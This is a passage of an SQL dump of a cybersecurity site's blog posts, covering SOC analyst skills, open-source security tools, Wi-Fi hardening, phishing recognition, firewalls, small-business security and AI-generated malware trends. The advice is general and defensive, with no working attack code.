disrupt, damage, or gain unauthorized access to systems.\n- **Phishing**: One of the most prevalent attacks, where users are tricked into revealing sensitive information or clicking malicious links.\n- **Distributed Denial of Service (DDoS)**: Attacks that overwhelm systems and networks to disrupt services.\n- **SQL Injection**: Exploiting vulnerabilities in database queries to gain unauthorized access to data.\n\nKnowing how these attacks work and recognizing their signs equips SOC Analysts to act swiftly and decisively.\n\n## 4. Get Comfortable with Security Tools\n\nSOC Analysts rely heavily on security tools to detect, analyze, and report incidents. To excel, be proficient in these key categories of tools:\n\n- **SIEM (Security Information and Event Management) Systems**: Tools like Splunk, IBM QRadar, or Elastic stack for analyzing events across the IT infrastructure.\n- **IDS/IPS (Intrusion Detection/Prevention Systems)**: Tools such as Snort or Zeek to identify and prevent suspicious activity.\n- **Firewalls**: Important for perimeter monitoring—SOCs often need to understand configuration rules and logs.\n- **Endpoint Detection and Response (EDR)**: Tools like CrowdStrike or Carbon Black that focus on endpoint security.\n\nHands-on experience is invaluable. Most employers will value proficiency in at least one tool in these categories.\n\n## 5. Master Log Analysis\n\nSOC Analysts process vast amounts of data daily, so the ability to analyze logs for security incidents is crucial. Logs are recorded across practically every network entity—firewalls, servers, routers—and contain vital clues about suspicious activity. Analysts should be able to:\n\n- Recognize patterns of malicious behavior across logs.\n- Filter and correlate data from multiple sources using SIEM systems.\n- Look out for anomalies like unusual login attempts or unauthorized file access.\n\nDeveloping sharp log analysis skills ensures no potential incident escapes detection.\n\n## 6. Understand Incident Response\n\nSOC Analysts play a critical role in the incident response lifecycle. Familiarity with these key steps provides structure in high-pressure situations:\n\n1. **Identification**: Recognize and verify the security incident.\n2. **Containment**: Isolate the affected systems to stop further damage.\n3. **Eradication**: Remove malicious entities from the network.\n4. **Recovery**: Restore systems and normal business functions without recurring vulnerabilities.\n5. **Post-Incident Analysis**: Document the event thoroughly and improve systems to prevent recurrence.\n\nSticking to a structured incident response plan minimizes downtime and improves organizational resilience.\n\n## 7. Grasp Threat Intelligence\n\nThreat intelligence gives SOC Analysts a proactive edge by helping them understand the broader cyber threat landscape. Analysts should focus on:\n\n- **Threat Actors**: Understanding who might target their company (e.g., nation-states, hacktivists, or insider threats).\n- **Tactics, Techniques, and Procedures (TTPs)**: Used by cybercriminals.\n- Tracking global or industry-specific emerging threats.\n\nUsing data from platforms like MITRE ATT&CK, VirusTotal, or Recorded Future will help your organization understand and prepare for potential risks.\n\n## 8. Stay Compliant with Regulations\n\nSOC Analysts must also align with compliance frameworks and regulations that secure data and protect privacy. Familiarize yourself with:\n\n- **GDPR**: For privacy compliance in Europe.\n- **HIPAA**: For handling healthcare data.', '', 'http://infoseclabs.io/uploads/1767909003079-180527002.png', 'SOC Analyst monitoring cybersecurity threats on computer screens', 1, 'published', '2026-01-08 16:49:00', '2026-01-09 00:50:08', 'Information Security', '10 Essentials Every SOC Analyst Must Know', 'Discover the top 10 skills every SOC Analyst needs to excel in cybersecurity defense.', 'SOC Analyst'),
(27, 'Exploring Open Source Tools for Cybersecurity Professionals', 'exploring-open-source-tools-for-cybersecurity-professionals', '# The Dynamic World of Cybersecurity Tools\n\nThe cybersecurity landscape is dynamic, challenging, and undeniably vital in today’s technology-driven world. Whether you\'re an aspiring SOC analyst, a network administrator, or someone interested in safeguarding digital assets, having the right tools at your disposal is critical. This is where open-source cybersecurity tools shine.\n\nThese tools are not just cost-effective but community-driven, continuously evolving, and highly customizable. From analyzing your network traffic to identifying vulnerabilities and monitoring potential threats, open-source tools are integral to ensuring robust cybersecurity. This blog explores three essential tools—Wireshark, Metasploit, and Snort—that every cybersecurity professional, beginner, or enthusiast should know about.\n\n## What Are Open Source Cybersecurity Tools?\n\nOpen-source cybersecurity tools are software programs with their source code made freely available to the public. This allows users to access, modify, and distribute the software in line with their specific needs.\n\n### Benefits of Open Source Tools:\n\n- **Cost-efficiency**: They’re generally free, making them accessible to anyone, including students and small organizations.\n- **Community Support**: Contributions from worldwide cybersecurity experts enhance features and fix vulnerabilities quickly.\n- **Customizability**: Users can tailor these tools to meet their unique cybersecurity requirements.\n\nFor cybersecurity roles, ranging from penetration testing to network administration, these tools offer the flexibility and power to perform critical tasks efficiently. Now, let\'s dig deep into three open-source giants in the cybersecurity space.\n\n## Wireshark: The Go-To Tool for Network Analysis\n\nWireshark is one of the most widely used open-source tools for network protocol analysis. Its comprehensive set of features allows users to capture, inspect, and analyze network traffic in real-time. Whether you’re troubleshooting network issues or detecting malicious activity, Wireshark can give you the insights you need.\n\n### Capabilities of Wireshark\n\n- Captures and inspects data packets across a network.\n- Identifies unusual spikes or suspicious traffic for further analysis.\n- Deciphers protocols and displays data in human-readable formats.\n- Offers filters to zero in on specific traffic (e.g., filtering by IP addresses or specific protocols).\n\n### How to Use Wireshark\n\n1. **Download and Install**:  \n   Visit the [official Wireshark website](https://www.wireshark.org/) to download the software for your operating system.\n\n2. **Capture Network Traffic**:  \n   Open Wireshark and choose the appropriate network interface (e.g., Wi-Fi, Ethernet). Click \"Start\" to begin capturing live data.\n\n3. **Apply Filters**:  \n   Use Wireshark’s powerful filters to narrow down your results. For example:\n   - `http` filters for HTTP traffic.\n   - `ip.src == [IP]` filters for packets originating from a specific IP address.\n\n4. **Analyze Data Packets**:  \n   Inspect individual packets for payloads, source/destination addresses, or protocol details.\n\n### Practical Use Cases\n\n- Troubleshooting network performance issues.\n- Identifying unauthorized devices on a network.\n- Detecting potential data breaches or malware communications.\n\nWireshark is invaluable for maintaining network transparency and spotting anomalies.\n\n## Metasploit: The Ultimate Penetration Testing Framework\n\nIf Wireshark is for monitoring, Metasploit is for offense. Metasploit is an open-source penetration testing framework that allows cybersecurity professionals to test system vulnerabilities by simulating cyberattacks in controlled environments.\n\n### Introduction to Metasploit\n\nMetasploit combines a massive library of exploits, payloads, and auxiliary tools to test the resilience of various systems against attacks. It’s widely used by ethical hackers to identify vulnerabilities before malicious actors exploit them.\n\n### Steps to Perform Vulnerability Testing with Metasploit\n\n1. **Setup and Installation**:  \n   Download Metasploit from the [Rapid7 website](https://www.metasploit.com/). It supports Linux, Windows, and macOS.\n\n2. **Select a Target**:  \n   Identify the system or service you want to test and gather its IP address or hostname.\n\n3. **Choose an Exploit**:  \n   Look for known vulnerabilities in Metasploit\'s database (use the `search [vulnerability]` command).\n\n4. **Test with a Payload**:  \n   Select a payload (e.g., reverse shell) and configure the parameters.\n\n5. **Execute Test**:  \n   Launch your simulated attack responsibly within a controlled setup.\n\n### Executors Beware! Use Metasploit Safely\n\n- Only use Metasploit in test environments or on systems you are authorized to test.\n- Always notify relevant stakeholders if you’re testing workplace systems.\n\nEthical hacking with Metasploit enables you to patch vulnerabilities before attackers can exploit them.\n\n## Snort: Your Intrusion Detection and Prevention Ally\n\nSnort, authored by Cisco Talos, is a popular open-source intrusion detection system (IDS) and intrusion prevention system (IPS). \n\n--- \n\nBy understanding and utilizing these open-source tools, you can significantly enhance your cybersecurity posture, whether you are monitoring network traffic, testing vulnerabilities, or preventing intrusions.', '', 'http://infoseclabs.io/uploads/1767909071893-784433651.jpg', 'Cybersecurity tools concept with digital security icons', 1, 'published', '2025-12-25 08:51:00', '2026-01-09 00:52:20', 'Information Security', 'Top Open Source Tools for Cybersecurity Experts', 'Discover the best open-source tools like Wireshark, Metasploit, and Snort for effective cybersecurity management.', 'Open Source Cybersecurity'),
(28, 'Secure Your Wi-Fi: Tips for a Stronger Network at Home', 'secure-your-wi-fi-tips-for-a-stronger-network-at-home', '# Securing Your Home Wi-Fi Network\n\nYour home Wi-Fi network is more than just an internet connection—it\'s the gateway to personal data, banking details, smart home devices, and much more. With the rise in cybersecurity threats, leaving your Wi-Fi network unprotected is like leaving your front door wide open. This guide will walk you through steps to secure your Wi-Fi and ensure that your network, and everything connected to it, stays safe from prying eyes.\n\nWhether you\'re an IT professional or someone simply looking to secure their home, these tips will help you create a stronger, safer network.\n\n## Understanding Wi-Fi Security Protocols\n\nWhen setting up your Wi-Fi, you\'ll encounter different security protocols. Understanding these is crucial for making informed decisions about your network\'s protection.\n\n- **WEP (Wired Equivalent Privacy)** – Outdated and highly vulnerable to attacks. Avoid this protocol.\n- **WPA (Wi-Fi Protected Access)** – A significant improvement over WEP, but now considered obsolete.\n- **WPA2** – Widely used and more secure than WPA. It\'s a good standard but not foolproof anymore.\n- **WPA3** – The most secure protocol currently available. If your router supports this, make sure to enable it.\n\n**Pro tip**: Always opt for WPA3 if it’s supported by your router and devices. If not, WPA2 should be your fallback.\n\n## Setting a Strong Password\n\nA weak Wi-Fi password is an open invitation to hackers. Here’s how to create a password that’s tough to crack but easy for you to remember:\n\n- Use at least 12 characters.\n- Combine uppercase and lowercase letters, numbers, and special characters.\n- Avoid using common words, names, or birthdates.\n- Use a passphrase, like \"My$SecureWi-Fi123\", that’s unique but memorable.\n\n**Pro tip**: Try a password manager to generate and store strong passwords securely.\n\n## Enabling Network Encryption\n\nEncryption scrambles your data, making it unreadable to unauthorized users. Most modern routers support encryption protocols like WPA2 or WPA3.\n\n### Step-by-step guide:\n\n1. Log in to your router’s admin panel (usually via a browser—check your router’s manual).\n2. Locate the wireless security settings.\n3. Select WPA3 (or WPA2 if WPA3 isn’t available).\n4. Save and reboot your router to apply changes.\n\n## Regularly Updating Firmware\n\nYour router’s firmware is essentially its operating system. Manufacturers frequently release updates to fix bugs and patch security vulnerabilities.\n\n1. Log in to your router’s admin panel.\n2. Check for a firmware update option (often found under “System” or “Settings”).\n3. Download and install updates as they become available.\n\n**Pro tip**: Some routers have auto-update features—enable this if it’s available.\n\n## Enabling Firewall Protection\n\nA firewall adds an additional layer of defense by monitoring and blocking malicious traffic. Many modern routers come with a built-in firewall, but it’s often disabled by default.\n\n- Log into your router’s admin settings and activate the firewall.\n- For advanced users, configure custom rules to enhance protection further.\n\n## Disabling WPS\n\nWi-Fi Protected Setup (WPS) was designed for convenience but is now recognized as a security vulnerability. Hackers can exploit WPS to gain unauthorized access.\n\nTo disable it:\n\n1. Go to the admin panel of your router.\n2. Find the WPS settings under “Wireless” or “Advanced settings.”\n3. Turn it off.\n\n## Changing the Default SSID\n\nThe default Service Set Identifier (SSID) is usually the brand name of your router, which makes it easier for attackers to identify and exploit its vulnerabilities.\n\n- Rename your network to something unique and unrelated to your name or address.\n- Avoid using personal information like your last name in the SSID.\n\n**Pro tip**: A generic name like “CoffeeHouse_Network” works well to obscure your identity.\n\n## Implementing MAC Address Filtering\n\nEvery device that connects to your network has a unique MAC address. By enabling MAC address filtering, you can control which devices are allowed to connect.\n\n1. Log in to your router’s admin panel and look for “MAC Filtering” under wireless or security settings.\n2. Add the MAC addresses of your trusted devices to the whitelist.\n\n**Note**: This method isn’t foolproof, as advanced hackers can spoof MAC addresses, but it adds an extra layer of defense.\n\n## Monitoring Connected Devices\n\nKeeping track of who is on your network helps you detect any unauthorized access.\n\n- Use your router’s admin panel to view a list of connected devices.\n- Regularly check for names or MAC addresses you don’t recognize.\n- Kick off intruders and change your Wi-Fi password if necessary.\n\n## Using a VPN\n\nA Virtual Private Network (VPN) encrypts your internet traffic and masks your IP address, adding extra protection against hackers.\n\n- Install a VPN on your router to secure every device connected to your network.\n- Alternatively, install a VPN on individual devices for more flexibility.\n\n## Setting Up a Guest Network\n\nAllowing visitors to connect to your main Wi-Fi puts your entire network at risk. Instead, create a guest network with limited access.\n\n1. Open your router’s settings.\n2. Look for “Guest Network” under wireless options.\n3. Assign a separate SSID and password for guests.\n\nThis keeps your main network safe while providing your visitors with internet access.', '', 'http://infoseclabs.io/uploads/1767909243749-760907848.png', 'Home Wi-Fi network security with router and firewall protection', 1, 'published', '2026-01-08 08:54:00', '2026-01-09 00:54:29', 'Information Security', 'Secure Your Wi-Fi: Tips for a Stronger Network', 'Learn essential tips to secure your home Wi-Fi network and protect personal data from cyber threats.', 'Wi-Fi security'),
(29, 'Anatomy of a Phishing Attack: How to Recognize the Signs', 'anatomy-of-a-phishing-attack-how-to-recognize-the-signs', '# Understanding Phishing Attacks: A Comprehensive Guide\n\nPhishing attacks are among the most common cybersecurity threats affecting businesses today. Whether it\'s a cleverly disguised email or a fraudulent website, phishing can result in financial loss, stolen data, and compromised systems. Yet, despite its prevalence, many small business owners and professionals remain unsure about how to identify and defend against these attacks.\n\nThis blog will guide you through the ins and outs of phishing campaigns. We\'ll cover the various types of phishing attacks, key signs to watch out for, real-world examples, and actionable steps to protect your business. By the end, you\'ll have the knowledge and tools to stay a step ahead of cybercriminals.\n\n## What Are Phishing Attacks?\n\nPhishing is a type of cyberattack where hackers pose as legitimate entities to trick victims into providing sensitive information, such as passwords, credit card numbers, or company data. These attacks are often carried out via fake emails, websites, or messages designed to appear highly authentic, making them difficult to spot.\n\nPhishing is the foundation of many larger cybercrimes, from ransomware attacks to financial fraud, making it essential for businesses to understand and mitigate these risks.\n\n### Why Are Small Businesses and Startups at Risk?\n\nSmaller businesses may not have the extensive cybersecurity measures that larger enterprises often possess, making them attractive targets for hackers. Entrepreneurs and IT professionals managing growing organizations are often juggling multiple priorities, increasing the likelihood of an attack slipping through unnoticed.\n\nUnderstanding phishing on a deeper level is the first step in fortifying your operations.\n\n## Common Types of Phishing Attacks\n\nPhishing tactics come in several forms, each tailored to exploit different types of vulnerabilities. Here’s a breakdown:\n\n### 1. Email Phishing\n\nThe most common form, email phishing, involves attackers sending messages that appear to come from trusted sources. These emails often include urgent calls to action, like \"Your account will be locked in 24 hours. Click here to reset your password.\"\n\n### 2. Spear Phishing\n\nUnlike generic phishing, spear phishing targets specific individuals or companies. Attackers often do their homework, researching their victim\'s job title and organization to craft personalized messages that feel legitimate.\n\n### 3. Clone Phishing\n\nThis involves creating a nearly identical copy of a legitimate email that the recipient has already received. By adding malicious links or attachments, attackers can exploit the trust the recipient places in the sender.\n\n### 4. Vishing (Voice Phishing)\n\nPhishing isn\'t limited to the digital space. Vishing uses phone calls to trick people into revealing sensitive information, often posing as a bank or tech support.\n\n### 5. Smishing (SMS Phishing)\n\nSimilar to email attacks, smishing occurs through text messages. These usually contain a malicious link, urging users to act quickly.\n\n### 6. Pharming\n\nPharming redirects users from a legitimate website to a fraudulent one, often by exploiting DNS servers. Once on the fake site, users unwittingly input critical data.\n\nUnderstanding these forms allows you to better anticipate and defend against phishing tactics.\n\n## Key Signs of a Phishing Email\n\nPhishing emails often appear legitimate, but close inspection can reveal inconsistencies. Here are key signs to look out for:\n\n1. **Suspicious Sender Addresses**  \n   Legitimate companies always use official email domains. Watch out for subtle misspellings like “@paypa1.com” instead of “@paypal.com.”\n\n2. **Urgency or Fear-Based Subject Lines**  \n   Attackers create a sense of panic to compel immediate action, such as “Your bank account has been compromised!”\n\n3. **Generic Greetings**  \n   Phishing emails often use vague greetings like “Dear customer” instead of your name.\n\n4. **Unexpected Attachments**  \n   Legitimate sources are unlikely to send attachments you didn’t request. Malicious attachments can infect your system with malware.\n\n5. **Links with Mismatched URLs**  \n   Hover over any links before clicking. A mismatch between the text and URL is a major red flag.\n\nThe devil is in the details when it comes to phishing, so slow down and review suspicious emails carefully.\n\n## Technical Indicators to Watch Out For\n\nBeyond visual cues, phishing emails often contain technical abnormalities:\n\n- **Misspelled URLs:** Check for slight deviations in trusted web addresses.\n- **Lack of HTTPS Security:** Legitimate companies use secure “https://” websites, especially for transactions.\n- **Unusual Metadata:** Analyzing an email’s header or source code can sometimes reveal forgery.\n\nTools that flag these issues, such as URL checkers or email filters, can help identify phishing attempts before the damage is done.\n\n## Real-World Phishing Case Studies\n\n### Case Study 1: The Google and Facebook Scam\n\nAttackers successfully scammed Google and Facebook out of over $100 million by posing as a legitimate vendor through fake invoices. Both companies fell for the trap and paid the fraudulent bills, showing that even tech giants aren’t immune.\n\n### Case Study 2: The Target Data Breach\n\nHackers gained access to Target\'s systems by spear phishing an HVAC subcontractor. The breach compromised 40 million customer credit card details and cost Target millions in lawsuits.\n\nThese real-world examples highlight the effectiveness of phishing and the critical need for preventative measures.\n\n## Steps to Take If You Suspect a Phishing Attempt\n\nIf you suspect an email or message is a phishing attempt, here’s what to do:\n\n1. **Don’t Click Links or Download Attachments:**  \n   Avoid engaging with suspected phishing content.\n\n2. **Verify the Sender:**  \n   Contact the company directly using official channels to confirm legitimacy.\n\n3. **Report the Email:**  \n   Most email providers allow you to flag suspicious emails as “phishing.”\n\n4. **Update Passwords:**  \n   If you’ve interacted with a phishing scam, immediately change affected passwords.\n\nHaving clear protocols for suspected phishing attempts can mitigate damage quickly.\n\n## Tools and Technologies to Protect Against Phishing\n\nLeveraging technology is critical in staying ahead of phishing threats. Consider using:\n\n1. **Email Security Software:**  \n   Tools like Mimecast and Proofpoint identify and filter phishing content.\n\n2. **Web Filtering Tools:**  \n   Prevent access to malicious websites with tools like OpenDNS.', '', 'http://infoseclabs.io/uploads/1767909305235-538274400.png', 'Illustration of a deceptive phishing email targeting a business', 1, 'published', '2026-01-08 16:55:00', '2026-01-09 00:55:55', NULL, 'Recognizing Phishing Attacks: Key Signs & Protection', 'Learn to recognize phishing attacks and protect your business from common cybersecurity threats with this comprehensive guide.', 'Phishing Attacks'),
(30, 'Firewalls vs. Next-Generation Firewalls (NGFW): What Cybersecurity Professionals Need to Know', 'firewalls-vs-next-generation-firewalls-ngfw-what-cybersecurity-professionals-need-to-know', '# Understanding Firewalls and Next-Generation Firewalls (NGFWs)\n\nCyber threats are evolving at an unprecedented pace, targeting businesses of all sizes and industries. At the frontline of defense are firewalls, essential tools for protecting networks and sensitive data. However, with increasingly sophisticated attacks, traditional firewalls can no longer keep up. Enter Next-Generation Firewalls (NGFWs): a cutting-edge solution for managing and mitigating modern threats.\n\nWhether you\'re an IT professional, a small business owner, or just beginning your cybersecurity career, understanding firewalls and NGFWs is critical to protecting networks in today’s digital landscape. This blog will break down what makes firewalls and NGFWs tick, examine their key differences, and show you how to implement them effectively.\n\n## What is a Firewall?\n\nA firewall is a device or software designed to monitor and regulate incoming and outgoing network traffic. Acting as a gatekeeper, it makes decisions about whether to allow or block specific traffic based on a predefined set of security rules.\n\n### A Brief History of Firewalls\n\nThe concept of firewalls dates back to the late 1980s. Early iterations, referred to as packet-filtering firewalls, focused solely on examining individual packets of data against predetermined security rules. By the mid-1990s, stateful inspection firewalls emerged, adding the ability to monitor the state of active connections—an important advancement at the time.\n\n### Basic Functions\n\nKey functions of a firewall include the following:\n\n- **Traffic filtering**: Prevents unauthorized access by filtering network packets.\n- **Protection against external threats**: Reduces the likelihood of attacks like malware and unauthorized hacking attempts.\n- **Port blocking**: Prevents attackers from exploiting unused or vulnerable ports.\n\nWhile traditional firewalls still serve essential purposes, their foundational role in cybersecurity is limited in addressing today’s advanced threats.\n\n## What is a Next-Generation Firewall (NGFW)?\n\nNGFWs are the natural evolution of traditional firewalls, offering advanced capabilities tailored to defend against modern threats. Beyond regulating network traffic, NGFWs incorporate sophisticated features like deep packet inspection, intrusion detection, and application-awareness.\n\n### Advanced Features of NGFWs\n\n1. **Deep Packet Inspection (DPI)**  \n   Unlike basic packet filtering, DPI analyzes the data within packets to detect malicious activity, such as malware or phishing attacks.\n\n2. **Intrusion Detection and Prevention Systems (IDPS)**  \n   NGFWs actively monitor network activity to identify and block suspicious behavior.\n\n3. **Application-Aware Filtering**  \n   This feature enables NGFWs to identify and control traffic based on the specific applications being used, helping safeguard against app-based vulnerabilities.\n\n4. **SSL/TLS Inspection**  \n   NGFWs can decrypt and inspect encrypted traffic, which is essential given the growing number of encrypted attacks.\n\n5. **User Identity Awareness**  \n   By integrating with authentication systems, NGFWs can apply user-specific policies, a critical enhancement for environments with multiple access roles.\n\n### Benefits Over Traditional Firewalls\n\nNGFWs are designed for modern challenges, providing a more comprehensive approach to network security by addressing complex threats traditional firewalls can’t. Their ability to integrate application-level filtering, behavioral analysis, and threat intelligence make NGFWs indispensable in advanced cybersecurity strategies.\n\n## Key Differences Between Firewalls and NGFWs\n\n| Feature                   | Traditional Firewalls                          | Next-Generation Firewalls (NGFWs)       |\n|---------------------------|------------------------------------------------|-----------------------------------------|\n| Traffic Filtering         | Basic packet filtering and stateful inspection | DPI, signature-based detection, and more|\n| Threat Detection          | Limited                                        | Advanced (malware, phishing, etc.)      |\n| Application Awareness     | Absent                                         | Present                                 |\n| SSL/TLS Inspection        | Limited or absent                              | Advanced with encrypted traffic analysis|\n| User Identity Integration | Minimal                                        | Advanced integration with user authentication|\n\nWhile traditional firewalls are suitable for simple network setups, most businesses and enterprises benefit from using NGFWs for robust and scalable protection against today’s sophisticated threats.\n\n## Why Are Firewalls and NGFWs Important?\n\nFirewalls and NGFWs play a critical role in cybersecurity by securing communication channels, protecting sensitive data, and reducing the risk of attacks. Here’s why they are indispensable:\n\n- **Prevention of Unauthorized Access**: They act as gatekeepers between internal systems and external networks.\n- **Safeguarding Sensitive Data**: Firewalls protect confidential information from unauthorized access or theft.\n- **Proactive Threat Management**: NGFWs detect and neutralize threats in real time.\n- **Regulatory Compliance**: Many industries, such as healthcare and finance, require robust network security measures like firewalls to comply with regulations.\n\n## Use Cases for Firewalls and NGFWs\n\n### Healthcare Industry\n\nHospitals and clinics use NGFWs to protect patient data and prevent unauthorized access to medical networks. NGFWs can also block suspicious activity targeting medical IoT devices.\n\n### E-Commerce Platforms\n\nOnline retailers integrate NGFWs to secure payment systems, prevent phishing attempts, and ensure PCI-DSS compliance for credit card transactions.\n\n### Education Institutions\n\nUniversities deploy firewalls and NGFWs to regulate traffic within vast campus networks and protect student and faculty data from cyber threats.\n\n### Small Businesses\n\nFor SMEs, NGFWs provide cost-effective solutions for safeguarding sensitive employee and client information while mitigating financial and reputational risks.\n\n## Best Practices for Implementing Firewalls and NGFWs\n\n[Content for this section is missing and incomplete. Please provide additional text to complete this section.]', '', 'http://infoseclabs.io/uploads/1768255882157-340195749.jpg', 'Comparison of traditional firewalls and Next-Generation Firewalls', 1, 'published', '2026-01-12 10:10:00', '2026-01-14 20:26:58', 'Information Security', 'Firewalls vs NGFW: Essential Cybersecurity Insights', 'Discover the key differences between traditional firewalls and Next-Gen Firewalls, crucial for modern cybersecurity.', 'Next-Generation Firewalls');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(31, 'Cybersecurity for Small Businesses: Affordable Best Practices', 'cybersecurity-for-small-businesses-affordable-best-practices', '# Protecting Your Small Business from Cyber Threats\n\nRunning a small business comes with its fair share of challenges: tight budgets, fierce competition, and limited resources. But one threat that often gets overlooked is cybersecurity breaches. Contrary to popular belief, cybercriminals don\'t just target large corporations. Small businesses and startups are frequently preyed upon because they often lack the robust defenses of their larger counterparts.\n\nIf you’re a small business owner or entrepreneur, this guide offers practical, budget-friendly cybersecurity measures to help keep your company safe from digital threats. You’ll learn about common cyber risks, cost-effective solutions, and actionable steps to create a solid cybersecurity plan.\n\n## Why Cybersecurity Matters for Small Businesses\n\nImagine what would happen if a cyberattack disrupted your operations. You could face the loss of sensitive customer data, reputational damage, or even financial ruin. According to the Cyber Readiness Report 2022, 46% of small businesses faced cyberattacks in the past year, with an average cost of $25,600 per attack.\n\nSmaller companies are particularly vulnerable because many lack dedicated IT teams or the funds to install advanced security systems. This makes affordable and achievable measures essential to safeguarding your business.\n\n## Understanding Common Cybersecurity Threats\n\nBefore you can protect your business, it’s important to understand the threats you’re defending against. Below are the most common cybersecurity risks small businesses face.\n\n### Phishing\n\nPhishing attacks trick employees into revealing sensitive information (such as passwords or credit card details) through fake emails, phone calls, or websites. These scams often appear to come from trusted sources, like a bank or a company executive.\n\n### Malware\n\nMalware, or “malicious software,” can infiltrate your systems via email attachments, downloads, or infected websites. It’s designed to corrupt, steal, or hold your data hostage. Common types of malware include viruses, worms, and spyware.\n\n### Ransomware\n\nRansomware attacks lock you out of your systems or data until you pay a ransom to the hackers. Small businesses are frequent targets because they’re perceived to have no choice but to pay to regain access to their data.\n\n## Affordable Cybersecurity Measures\n\nThe good news? You don’t need a sky-high budget to protect your business. Here are affordable practices and tools to safeguard your company against cyber threats.\n\n### Employee Training and Awareness\n\nYou can have the best tools in the world, but one phishing click from an employee can compromise them all. Provide mandatory cybersecurity training to ensure your team recognizes warning signs like phishing emails and suspicious websites.\n\n**Pro tip:** Free platforms like Cyber Aware offer training material tailored to small businesses.\n\n### Strong Password Policies\n\nWeak passwords are one of the most common vulnerabilities in any organization. Implement stronger password protocols to reduce risk. Encourage employees to use passwords that include a mix of uppercase and lowercase letters, numbers, and special characters.\n\nUse a password manager like LastPass or Bitwarden to create and securely store unique passwords.\n\n### Software Updates and Patch Management\n\nOutdated software is a playground for hackers. Ensure all your software—including operating systems, browsers, and plugins—are updated regularly. Enable automatic updates wherever possible to ensure you always have the latest version.\n\n**Budget tip:** Updates are free and often include critical security patches. Prioritize this practice!\n\n### Firewalls and Antivirus Software\n\nFirewalls act as a barrier between your internal networks and external threats, while antivirus software detects and removes malware. Together, they provide a multi-layered defense against cyberthreats.\n\nAffordable options include ZoneAlarm Free Firewall and AVG Antivirus Free.\n\n### Data Backup and Recovery\n\nOne of the most effective ways to minimize the impact of a ransomware attack or hardware failure is by having a reliable data backup system in place. Use the 3-2-1 rule:\n\n- Keep **3** copies of your data\n- Store them on **2** different types of media (e.g., external drive, cloud)\n- Keep **1** copy offsite for disaster recovery\n\nFree or low-cost services like Google Drive and IDrive for Business offer excellent options for smaller budgets.\n\n## Free or Low-Cost Tools for Cybersecurity\n\nLeveraging free or affordable tools can amplify your business\'s defense without breaking the bank. Here’s a list tailored for small businesses.\n\n- **Password Managers:** Bitwarden (free for individuals, $10/year per user for businesses).\n- **Antivirus Software:** Avast Free Antivirus or Sophos Home Free.\n- **Backup Tools:** IDrive offers 5 GB of free storage, with scalable paid plans for growing businesses.\n- **Phishing Defense:** Use free browser extensions like Netcraft to flag suspicious websites.\n- **Firewall Solutions:** Cisco Meraki’s small business offerings help secure devices with cost-effective firewall management.\n\n## Creating a Cybersecurity Plan: Step-by-Step Guide\n\nWithout a formal plan, your cybersecurity efforts might fall short. Follow these five steps to create a practical and actionable plan for your business.\n\n### Step 1: Assess Your Risks\n\nWhich assets—data, software, or hardware—are most critical to your business? Identify potential weak spots in your infrastructure, such as outdated software or overly accessible employee accounts.\n\n### Step 2: Define Your Objectives\n\nWhat do you want to achieve with your cybersecurity initiatives? For example, you might aim to reduce phishing incidents by 50% or ensure critical data backups are executed weekly.\n\n### Step 3: Implement Basic Security Measures\n\nStart with the essentials mentioned earlier—secure passwords, regular updates, and employee training.\n\n### Step 4: Document Your Policies\n\nWrite down procedures for handling sensitive data, managing software, and responding to breaches. This guide should be accessible to all employees and regularly updated.\n\n### Step 5: Monitor and Improve\n\nCybersecurity is an ongoing process. Conduct regular audits of your systems and protocols to ensure they’re up to date. Use monitoring tools like Splunk or SolarWinds to track network activity and detect anomalies.\n\n## Securing Your Business Future\n\nProtecting your business against cyberattacks doesn’t have to drain your budget. With the right mix of awareness, affordable tools, and proactive planning, you can significantly lower your risk without sacrificing your bottom line.\n\nSmall steps today can make a big difference tomorrow. Don’t wait for a cyberattack to show you the importance of cybersecurity. Start implementing these best practices now and build a resilient foundation for your business.\n\nIf you’re interested in advanced tools or tailored cybersecurity advice, many IT professionals and consultants specifically help small businesses. There’s no better time to fortify your defenses.', '', 'http://infoseclabs.io/uploads/1768411599121-644071808.jpg', 'Small business owner securing digital data from cyber threats', 1, 'published', '2026-01-13 23:00:00', '2026-01-14 21:14:36', 'Information Security', 'Cybersecurity Tips for Small Businesses', 'Discover affordable cybersecurity practices to protect your small business from digital threats and cyberattacks.', 'Cybersecurity'),
(32, 'AI-Generated Malware: Rising Cybersecurity Threats and How to Defend Against Them', 'ai-generated-malware-rising-cybersecurity-threats-and-how-to-defend-against-them', '# The Rise of AI-Generated Malware and How to Defend Against It\n\nArtificial Intelligence (AI) is revolutionizing sectors like healthcare and finance, but it’s also making waves in the realm of cybercrime. AI-generated malware is a new threat that exploits machine learning (ML) and automation to bypass traditional security measures. This article breaks down how AI malware works and outlines actionable defense strategies for cybersecurity professionals, IT teams, and researchers.\n\n## What is AI-Generated Malware?\n\nUnlike traditional malware, AI-generated threats can learn, adapt, and evolve to evade detection. This makes them more sophisticated and harder to counter. Here\'s how attackers use AI to amplify their efforts:\n\n### 1. Polymorphic Malware\n\nAI allows malware to continuously modify its code base, evading detection by signature-based antivirus tools. These frequent changes make it nearly impossible to spot with outdated systems.\n\n### 2. AI-Powered Phishing\n\nBy mimicking natural writing styles, AI generates phishing emails that appear human-like and highly convincing, dramatically increasing risk for unsuspecting users.\n\n### 3. Automated Exploit Generation\n\nWith machine learning, attackers rapidly identify software vulnerabilities and create automated exploits, slashing the development time for new attack vectors.\n\n### 4. Advanced Evasion Tactics\n\nAI-generated malware uses live analysis to adjust its approach in real-time, employing sandbox detection, adversarial ML techniques, or behavior evasion to avoid security measures.\n\n### 5. Bypassing Endpoint Detection and Response (EDR)\n\nAI can manipulate activity signatures, disguise itself within system processes, and delay execution until it’s no longer being monitored—rendering many endpoint solutions blind to its actions.\n\n## How to Defend Against AI Malware\n\nThe evolving landscape of AI-driven threats requires defenders to adopt equally advanced solutions. Below are key strategies to counteract these dangers:\n\n### 1. Implement AI-Powered Defenses\n\nSecurity teams must deploy AI-driven solutions capable of analyzing vast data sets, identifying anomalies, and detecting AI malware in real-time. Tools powered by AI can match the sophistication of these emerging threats.\n\n### 2. Adopt a Zero Trust Architecture (ZTA)\n\nIntroduce a Zero Trust Model that assumes no user or system is inherently secure. Strengthen defenses with strict access controls, multi-factor authentication (MFA), and ongoing system monitoring.\n\n### 3. Upgrade to Advanced Endpoint Protection\n\nUse next-generation antivirus (NGAV) and endpoint detection and response (EDR) solutions built on ML. These tools recognize behavior patterns and preemptively block 